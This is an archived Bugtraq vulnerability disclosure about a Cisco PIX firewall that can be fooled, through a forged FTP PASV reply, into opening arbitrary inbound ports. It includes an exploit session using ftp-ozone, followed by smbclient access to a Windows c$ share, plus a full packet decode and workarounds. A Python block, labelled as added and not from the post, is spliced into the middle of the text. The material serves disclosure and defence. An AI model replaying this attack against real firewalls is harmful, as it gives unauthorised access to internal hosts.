Bugtraq mailing list archives
Verified PIX vulnerability to FTP-Pasv attack.
From: monti () USHOST COM (monti)
Date: Sun, 19 Mar 2000 15:07:44 -0600
Greetings,

I sent this to Cisco about 2 weeks ago, and have received a few responses. Apparently a fix is in the works, and may already have been released by this time unbeknownst to me (although I looked for it and have not found it yet). In any case, I thought it would be valuable to eventually post this so that sysadmins had a little more information about how PIX is affected along with a few possible workarounds. The problem is definitely very serious, and there are major differences in the way the PIX is affected compared with Firewall-1.

Note: This analysis relates solely to the 'server' attack, not the 'client' variation of the attack that Mikael Olsson and Dug Song have discussed most recently. Mikael's initial posting about the Firewall-1 ftp-pasv vulnerability did prompt me to look into the PIX further though. As has been already publicized, outbound connections from clients are also subject to manipulation.

Please see the credits in the attached message.

Eric Monti
Denmac Systems
ericm () denmac com
monti () ushost com
847.291.7760

Summary:
--------

I confirmed and did some more research regarding the PIX hole mentioned by Jacek Lipkowski on bugtraq entitled:

  Re: Addendum to Firewall-1 FTP Server Vulnerability

It is unknown whether Cisco has been made aware of this vulnerability, and as such I am forwarding my findings.

I was able to verify that PIX is vulnerable to the FTP-Pasv vulnerability that has been discussed on the Bugtraq mailing list as of late. Here are my notes and findings.

In a nutshell, the PIX can be fooled into opening up ports for inbound connections to a DMZ FTP server if the FTP server can be fooled into sending back what looks like a valid "227 (xxx,xxx,xxx,xxx,prt,prt)" response. The problem on the PIX is that the 'fixup protocol ftp' component does not provide sufficient checks to verify PASV connections before creating a dynamic hole through the firewall.
Note that there are several ways to get the FTP server to generate the message that will trigger PIX's insecure behaviour. Please see the 'Relevant Links' section for more on this.

The exploit used for testing was Dug Song's ftp-ozone.c which was posted to bugtraq.

The PIX tested is running the 4.4(4) version of software. Other versions have not been tested but are most likely vulnerable.

Exploit notes:
--------------

Here is the session from the attacker. "ftp-ozone" is the public exploit from Dug Song. I made a few minor 'aesthetic' adjustments and added support for anonymous login with '-l' (although it wasn't used in this example). The source code is attached.

-snip-
--------------Exploit Launched-----------------
[root@ix ftp-atk]# ./ftp-ozone 10.1.2.3 139
220 victim Microsoft FTP Service (Version 4.0).
Garbage packet contains:
500 '...........................................................................................................................
Money packet contains:
227 (10,1,2,3,0,139)': command not understood
-------------Opened port connected (NBT)-------
[root@ix ftp-atk]# smbclient \\\\VICTIM\\c$ -I 10.1.2.3 -U administrator
Added interface ip=127.0.0.1 bcast=127.255.255.255 nmask=255.0.0.0
Password: ********
Domain=[VICTIM] OS=[Windows NT 4.0] Server=[NT LAN Manager 4.0]
smb: \> dir
  AUTOEXEC.BAT                     A           0  Mon Mar 13 03:22:58 2000
  boot.ini                       ASR         279  Mon Mar 13 03:15:07 2000
  CONFIG.SYS                       A           0  Mon Mar 13 03:22:58 2000
  IO.SYS                        AHSR           0  Mon Mar 13 03:22:58 2000
  MSDOS.SYS                     AHSR           0  Mon Mar 13 03:22:58 2000
  MSSCE                            D           0  Tue Mar  7 14:29:57 2000
  NTDETECT.COM                  AHSR       26816  Tue Mar  7 11:47:49 2000
  ntldr                         AHSR      156496  Tue Mar  7 11:47:49 2000
  pagefile.sys                     A  1073741824  Tue Mar  7 11:51:51 2000
  Program Files                    D           0  Tue Mar  7 11:35:11 2000
  RECYCLER                       DHS           0  Mon Mar 13 09:35:51 2000
  TEMP                            DA           0  Tue Mar  7 14:36:31 2000
  WINNT                            D           0  Tue Mar  7 14:30:05 2000

                64706 blocks of size 65536. 43841 blocks available
smb: \> quit
-snip--

As you can see above, after the manipulated packet generated from the FTP server by ftp-ozone is returned, we are able to connect to the NBT (tcp/139) service and access a share.

On the PIX with 'logging console debug' set, this was all that showed up:

  302001: Built inbound TCP connection 202 for faddr 10.1.2.4/1139 gaddr 10.1.2.3/21 laddr 192.168.205.2/21

I have attached a packet decode generated from tcpdump -w. The IPs used are as follows:

  attacker=10.1.2.4, victim-nat=10.1.2.3, victim-real=192.168.205.2 (doesn't appear in decode)

The PIX sits between 10.1.2.4 and 192.168.2.2 (obviously).

In Packet #11 of the decode, in the TCP data segment, you can see what is triggering the PIX's insecure behavior:

  "227 (10,1,2,3,0,139)': command not understood."

This confirms what was assumed: that the only check that the PIX makes before creating a dynamic PASV conduit is whether the "227 (xxx,xxx,xxx,xxx,prt,prt)" appears at the beginning of the packet.

Synopsis/Workarounds:
---------------------

Essentially this is the same as the more widely publicized Firewall-1 incarnation of the hole (without their patch), only there are a few major differences to note:

1. The port opened will allow bi-directional traffic (confirmed in PIX 4.4(4), probably others as well).

2. *ANY* port can be opened, even low-numbered and well-known ports. This could be worked around with a conduit ACL using explicit denies on the external interface.

3. The 'fixup protocol ftp' is what appears to be the core of this problem on the PIX side of it. If it is disabled the exploit (in any version) will not work. This is what handles PASV FTP on the PIX. If you disable it though, there are two things to note:
   - Outbound ftp connections from the inside *have* to be made with PASV ftp clients.
   - Inbound ftp connections from the outside world cannot use PASV.

There may be other workarounds than those cited above. Any comments/suggestions are welcome!
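The check the post identifies, as an added Python example that is not code from the post, from Cisco or from ftp-ozone: it models the prefix-only rule beside the line-level checks a fixup should make before opening a conduit, and replays packets 6-11 through both. `PasvGuard`, `parse_227`, `naive_pasv_hole`, `replay` and the 128-byte reply split (taken from packet 9's data length) are this example's own assumptions.

```python
import re

_TUPLE = r"\((\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\)"  # RFC 959 h1,h2,h3,h4,p1,p2

def parse_227(text):
    """Return (ip, port) from the first h1,h2,h3,h4,p1,p2 tuple in text, or None."""
    m = re.search(_TUPLE, text)
    if not m or max(map(int, m.groups())) > 255:
        return None
    a, b, c, d, p1, p2 = map(int, m.groups())
    return f"{a}.{b}.{c}.{d}", p1 * 256 + p2

def naive_pasv_hole(segment):
    """The prefix-only rule the post describes: a segment *beginning* '227 (' opens a hole."""
    return parse_227(segment) if segment.startswith("227 (") else None

class PasvGuard:
    """Reassemble reply lines (segment boundaries mean nothing); open a conduit only
    for a 227 answering a real PASV, with nothing after its tuple, naming the server."""

    def __init__(self, server_ip, min_port=1024):
        self.server_ip, self.min_port = server_ip, min_port  # min_port: workaround 2
        self.pasv_pending, self.buf = False, ""

    def client_command(self, line):
        # Only a bare PASV arms the guard; any other command disarms it.
        self.pasv_pending = line.strip().upper() == "PASV"

    def server_segment(self, data):
        """Feed one server->client TCP segment; return (ip, port) if a conduit may open."""
        self.buf, opened = self.buf + data, None
        while "\r\n" in self.buf:
            line, self.buf = self.buf.split("\r\n", 1)
            if not self.pasv_pending:
                continue
            self.pasv_pending = False  # the first complete reply answers the PASV
            if re.fullmatch(r"227 [^\r\n]*?" + _TUPLE + r"\.?", line):
                ip, port = parse_227(line) or (None, 0)
                if ip == self.server_ip and port >= self.min_port:
                    opened = (ip, port)
        return opened

def replay():
    # Packets 6-11 reconstructed: the bogus command comes back inside a 500 reply
    # that the server sends in 128-byte pieces, so piece two starts with '227 ('.
    cmd = "." * 123 + "227 (10,1,2,3,0,139)"
    seg1 = "500 '" + cmd[:123]
    seg2 = cmd[123:] + "': command not understood\r\n"
    guard = PasvGuard("10.1.2.3")
    guard.client_command(cmd)
    naive = naive_pasv_hole(seg2)  # the PIX rule: hole to tcp/139
    strict = guard.server_segment(seg1) or guard.server_segment(seg2)
    guard.client_command("PASV")  # a genuine passive-mode exchange for contrast
    genuine = guard.server_segment("227 Entering Passive Mode (10,1,2,3,4,10).\r\n")
    return {"naive": naive, "strict": strict, "genuine": genuine}
```

The strict path rejects the echoed reply twice over: the client never sent PASV, and once the two segments are joined the line is a 500, not a 227.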
Relevant Links:
---------------

Vulnerability description/workarounds for Firewall-1 incarnation of the bug:

  http://www.securityfocus.com/vdb/bottom.html?vid=979

Link to bugtraq mailing list archive discussing vulnerability and Checkpoint workaround (please note comments about the problems with the Checkpoint patch and some of the things to watch out for in implementing a fix):

  http://www.securityfocus.com/templates/archive.pike?list=1&date=2000-02-8&thread=Pine.LNX.4.21.0002142201030.4674-100000 () ns ldc ro

Link to Checkpoint's patch:

  http://www.checkpoint.com/techsupport/alerts/pasvftp.html

Credits:
--------

I did not find this hole (initially). It was discovered officially and publicized by several other people. Much thanks goes to these folks!

Jacek Lipkowski sq5bpf () ACID CH PW EDU PL
  For originally verifying PIX's vulnerability based on Firewall-1 discussions.

Mikael Olsson mikael.olsson () enternet se
  For original bugtraq postings, insights regarding this issue, and Firewall-1 confirmation.

Dataprotect:
  John McDonald <jm () dataprotect com>
  Thomas Lopatic <tl () dataprotect com>
  For their verification of the vulnerability on Checkpoint Firewall-1.

Dug Song: dugsong () monkey org
  For original public exploit code.

Please see www.securityfocus.com bugtraq archive for all relevant posts.

I am copying all of the above people, and will be waiting for 10 days for a response from Cisco regarding this hole before releasing any more information publicly. If need be, I can wait longer if a fix is in the works, although the existence of the bug has already been made public. I cannot control whether this will be forwarded to other parties by the other people CC'd so I leave that to their discretion.
Thanks,

Eric Monti
Denmac Systems
ericm () denmac com
847.291.7760


Packet 1
  Timestamp: 15:02:37.130283
  Source Ethernet Address: 00:50:04:28:FE:EB   Destination Ethernet Address: 00:D0:B7:0E:18:AB   Encapsulated Protocol: IP
  IP Header
    Version: 4   Header Length: 20 bytes   Service Type: 0x00   Datagram Length: 60 bytes
    Identification: 0x04CF   Flags: MF=off, DF=on   Fragment Offset: 0   TTL: 64
    Encapsulated Protocol: TCP   Header Checksum: 0x1D4C
    Source IP Address: 10.1.2.4   Destination IP Address: 10.1.2.3
  TCP Header
    Source Port: 1139 (<unknown>)   Destination Port: 21 (ftp)
    Sequence Number: 1818403974   Acknowledgement Number: 0000000000
    Header Length: 40 bytes (data=0)
    Flags: URG=off, ACK=off, PSH=off, RST=off, SYN=on, FIN=off
    Window Advertisement: 128 bytes   Checksum: 0x78CB   Urgent Pointer: 0
    <Options not displayed>
  TCP Data
    <No data>
-----------------------------------------------------------------
Packet 2
  Timestamp: 15:02:37.130720
  Source Ethernet Address: 00:D0:B7:0E:18:AB   Destination Ethernet Address: 00:50:04:28:FE:EB   Encapsulated Protocol: IP
  IP Header
    Version: 4   Header Length: 20 bytes   Service Type: 0x00   Datagram Length: 44 bytes
    Identification: 0x4311   Flags: MF=off, DF=on   Fragment Offset: 0   TTL: 128
    Encapsulated Protocol: TCP   Header Checksum: 0x9F19
    Source IP Address: 10.1.2.3   Destination IP Address: 10.1.2.4
  TCP Header
    Source Port: 21 (ftp)   Destination Port: 1139 (<unknown>)
    Sequence Number: 1212576390   Acknowledgement Number: 1818403975
    Header Length: 24 bytes (data=0)
    Flags: URG=off, ACK=on, PSH=off, RST=off, SYN=on, FIN=off
    Window Advertisement: 8760 bytes   Checksum: 0x8CFE   Urgent Pointer: 0
    <Options not displayed>
  TCP Data
    <No data>
-----------------------------------------------------------------
Packet 3
  Timestamp: 15:02:37.130765
  Source Ethernet Address: 00:50:04:28:FE:EB   Destination Ethernet Address: 00:D0:B7:0E:18:AB   Encapsulated Protocol: IP
  IP Header
    Version: 4   Header Length: 20 bytes   Service Type: 0x00   Datagram Length: 40 bytes
    Identification: 0x04D0   Flags: MF=off, DF=on   Fragment Offset: 0   TTL: 64
    Encapsulated Protocol: TCP   Header Checksum: 0x1D5F
    Source IP Address: 10.1.2.4   Destination IP Address: 10.1.2.3
  TCP Header
    Source Port: 1139 (<unknown>)   Destination Port: 21 (ftp)
    Sequence Number: 1818403975   Acknowledgement Number: 1212576391
    Header Length: 20 bytes (data=0)
    Flags: URG=off, ACK=on, PSH=off, RST=off, SYN=off, FIN=off
    Window Advertisement: 128 bytes   Checksum: 0xC673   Urgent Pointer: 0
  TCP Data
    <No data>
-----------------------------------------------------------------
Packet 4
  Timestamp: 15:02:37.131178
  Source Ethernet Address: 00:D0:B7:0E:18:AB   Destination Ethernet Address: 00:50:04:28:FE:EB   Encapsulated Protocol: IP
  IP Header
    Version: 4   Header Length: 20 bytes   Service Type: 0x00   Datagram Length: 88 bytes
    Identification: 0x4411   Flags: MF=off, DF=on   Fragment Offset: 0   TTL: 128
    Encapsulated Protocol: TCP   Header Checksum: 0x9DED
    Source IP Address: 10.1.2.3   Destination IP Address: 10.1.2.4
  TCP Header
    Source Port: 21 (ftp)   Destination Port: 1139 (<unknown>)
    Sequence Number: 1212576391   Acknowledgement Number: 1818403975
    Header Length: 20 bytes (data=48)
    Flags: URG=off, ACK=on, PSH=on, RST=off, SYN=off, FIN=off
    Window Advertisement: 8760 bytes   Checksum: 0x0458   Urgent Pointer: 0
  TCP Data
    220 wapp2 Microsoft FTP Service (Version 4.0)..
-----------------------------------------------------------------
Packet 5
  Timestamp: 15:02:37.131204
  Source Ethernet Address: 00:50:04:28:FE:EB   Destination Ethernet Address: 00:D0:B7:0E:18:AB   Encapsulated Protocol: IP
  IP Header
    Version: 4   Header Length: 20 bytes   Service Type: 0x00   Datagram Length: 40 bytes
    Identification: 0x04D1   Flags: MF=off, DF=on   Fragment Offset: 0   TTL: 64
    Encapsulated Protocol: TCP   Header Checksum: 0x1D5E
    Source IP Address: 10.1.2.4   Destination IP Address: 10.1.2.3
  TCP Header
    Source Port: 1139 (<unknown>)   Destination Port: 21 (ftp)
    Sequence Number: 1818403975   Acknowledgement Number: 1212576439
    Header Length: 20 bytes (data=0)
    Flags: URG=off, ACK=on, PSH=off, RST=off, SYN=off, FIN=off
    Window Advertisement: 80 bytes   Checksum: 0xC673   Urgent Pointer: 0
  TCP Data
    <No data>
-----------------------------------------------------------------
Packet 6
  Timestamp: 15:02:47.126818
  Source Ethernet Address: 00:50:04:28:FE:EB   Destination Ethernet Address: 00:D0:B7:0E:18:AB   Encapsulated Protocol: IP
  IP Header
    Version: 4   Header Length: 20 bytes   Service Type: 0x00   Datagram Length: 163 bytes
    Identification: 0x04D2   Flags: MF=off, DF=on   Fragment Offset: 0   TTL: 64
    Encapsulated Protocol: TCP   Header Checksum: 0x1CE2
    Source IP Address: 10.1.2.4   Destination IP Address: 10.1.2.3
  TCP Header
    Source Port: 1139 (<unknown>)   Destination Port: 21 (ftp)
    Sequence Number: 1818403975   Acknowledgement Number: 1212576439
    Header Length: 20 bytes (data=123)
    Flags: URG=off, ACK=on, PSH=on, RST=off, SYN=off, FIN=off
    Window Advertisement: 128 bytes   Checksum: 0x96BF   Urgent Pointer: 0
  TCP Data
    ...........................................................................................................................
-----------------------------------------------------------------
Packet 7
  Timestamp: 15:02:47.248131
  Source Ethernet Address: 00:D0:B7:0E:18:AB   Destination Ethernet Address: 00:50:04:28:FE:EB   Encapsulated Protocol: IP
  IP Header
    Version: 4   Header Length: 20 bytes   Service Type: 0x00   Datagram Length: 40 bytes
    Identification: 0x4511   Flags: MF=off, DF=on   Fragment Offset: 0   TTL: 128
    Encapsulated Protocol: TCP   Header Checksum: 0x9D1D
    Source IP Address: 10.1.2.3   Destination IP Address: 10.1.2.4
  TCP Header
    Source Port: 21 (ftp)   Destination Port: 1139 (<unknown>)
    Sequence Number: 1212576439   Acknowledgement Number: 1818404098
    Header Length: 20 bytes (data=0)
    Flags: URG=off, ACK=on, PSH=off, RST=off, SYN=off, FIN=off
    Window Advertisement: 8637 bytes   Checksum: 0xA48B   Urgent Pointer: 0
  TCP Data
    <No data>
-----------------------------------------------------------------
Packet 8
  Timestamp: 15:02:47.248184
  Source Ethernet Address: 00:50:04:28:FE:EB   Destination Ethernet Address: 00:D0:B7:0E:18:AB   Encapsulated Protocol: IP
  IP Header
    Version: 4   Header Length: 20 bytes   Service Type: 0x00   Datagram Length: 69 bytes
    Identification: 0x04D3   Flags: MF=off, DF=on   Fragment Offset: 0   TTL: 64
    Encapsulated Protocol: TCP   Header Checksum: 0x1D3F
    Source IP Address: 10.1.2.4   Destination IP Address: 10.1.2.3
  TCP Header
    Source Port: 1139 (<unknown>)   Destination Port: 21 (ftp)
    Sequence Number: 1818404098   Acknowledgement Number: 1212576439
    Header Length: 20 bytes (data=29)
    Flags: URG=off, ACK=on, PSH=on, RST=off, SYN=off, FIN=off
    Window Advertisement: 128 bytes   Checksum: 0x2602   Urgent Pointer: 0
  TCP Data
    227 (10,1,2,3,0,139).
-----------------------------------------------------------------
Packet 9
  Timestamp: 15:02:47.248558
  Source Ethernet Address: 00:D0:B7:0E:18:AB   Destination Ethernet Address: 00:50:04:28:FE:EB   Encapsulated Protocol: IP
  IP Header
    Version: 4   Header Length: 20 bytes   Service Type: 0x00   Datagram Length: 168 bytes
    Identification: 0x4611   Flags: MF=off, DF=on   Fragment Offset: 0   TTL: 128
    Encapsulated Protocol: TCP   Header Checksum: 0x9B9D
    Source IP Address: 10.1.2.3   Destination IP Address: 10.1.2.4
  TCP Header
    Source Port: 21 (ftp)   Destination Port: 1139 (<unknown>)
    Sequence Number: 1212576439   Acknowledgement Number: 1818404127
    Header Length: 20 bytes (data=128)
    Flags: URG=off, ACK=on, PSH=off, RST=off, SYN=off, FIN=off
    Window Advertisement: 8608 bytes   Checksum: 0x168C   Urgent Pointer: 0
  TCP Data
    500 '...........................................................................................................................
-----------------------------------------------------------------
Packet 10
  Timestamp: 15:02:47.248599
  Source Ethernet Address: 00:50:04:28:FE:EB   Destination Ethernet Address: 00:D0:B7:0E:18:AB   Encapsulated Protocol: IP
  IP Header
    Version: 4   Header Length: 20 bytes   Service Type: 0x00   Datagram Length: 40 bytes
    Identification: 0x04D4   Flags: MF=off, DF=on   Fragment Offset: 0   TTL: 64
    Encapsulated Protocol: TCP   Header Checksum: 0x1D5B
    Source IP Address: 10.1.2.4   Destination IP Address: 10.1.2.3
  TCP Header
    Source Port: 1139 (<unknown>)   Destination Port: 21 (ftp)
    Sequence Number: 1818404127   Acknowledgement Number: 1212576567
    Header Length: 20 bytes (data=0)
    Flags: URG=off, ACK=on, PSH=off, RST=off, SYN=off, FIN=off
    Window Advertisement: 128 bytes   Checksum: 0xC52B   Urgent Pointer: 0
  TCP Data
    <No data>
-----------------------------------------------------------------
Packet 11
  Timestamp: 15:02:47.248836
  Source Ethernet Address: 00:D0:B7:0E:18:AB   Destination Ethernet Address: 00:50:04:28:FE:EB   Encapsulated Protocol: IP
  IP Header
    Version: 4   Header Length: 20 bytes   Service Type: 0x00   Datagram Length: 94 bytes
    Identification: 0x4711   Flags: MF=off, DF=on   Fragment Offset: 0   TTL: 128
    Encapsulated Protocol: TCP   Header Checksum: 0x9AE7
    Source IP Address: 10.1.2.3   Destination IP Address: 10.1.2.4
  TCP Header
    Source Port: 21 (ftp)   Destination Port: 1139 (<unknown>)
    Sequence Number: 1212576567   Acknowledgement Number: 1818404127
    Header Length: 20 bytes (data=54)
    Flags: URG=off, ACK=on, PSH=on, RST=off, SYN=off, FIN=off
    Window Advertisement: 8608 bytes   Checksum: 0x1DD1   Urgent Pointer: 0
  TCP Data
    227 (10,1,2,3,0,139)': command not understood.
-----------------------------------------------------------------
Packet 12
  Timestamp: 15:02:47.266742
  Source Ethernet Address: 00:50:04:28:FE:EB   Destination Ethernet Address: 00:D0:B7:0E:18:AB   Encapsulated Protocol: IP
  IP Header
    Version: 4   Header Length: 20 bytes   Service Type: 0x00   Datagram Length: 40 bytes
    Identification: 0x04D5   Flags: MF=off, DF=on   Fragment Offset: 0   TTL: 64
    Encapsulated Protocol: TCP   Header Checksum: 0x1D5A
    Source IP Address: 10.1.2.4   Destination IP Address: 10.1.2.3
  TCP Header
    Source Port: 1139 (<unknown>)   Destination Port: 21 (ftp)
    Sequence Number: 1818404127   Acknowledgement Number: 1212576621
    Header Length: 20 bytes (data=0)
    Flags: URG=off, ACK=on, PSH=off, RST=off, SYN=off, FIN=off
    Window Advertisement: 128 bytes   Checksum: 0xC4F5   Urgent Pointer: 0
  TCP Data
    <No data>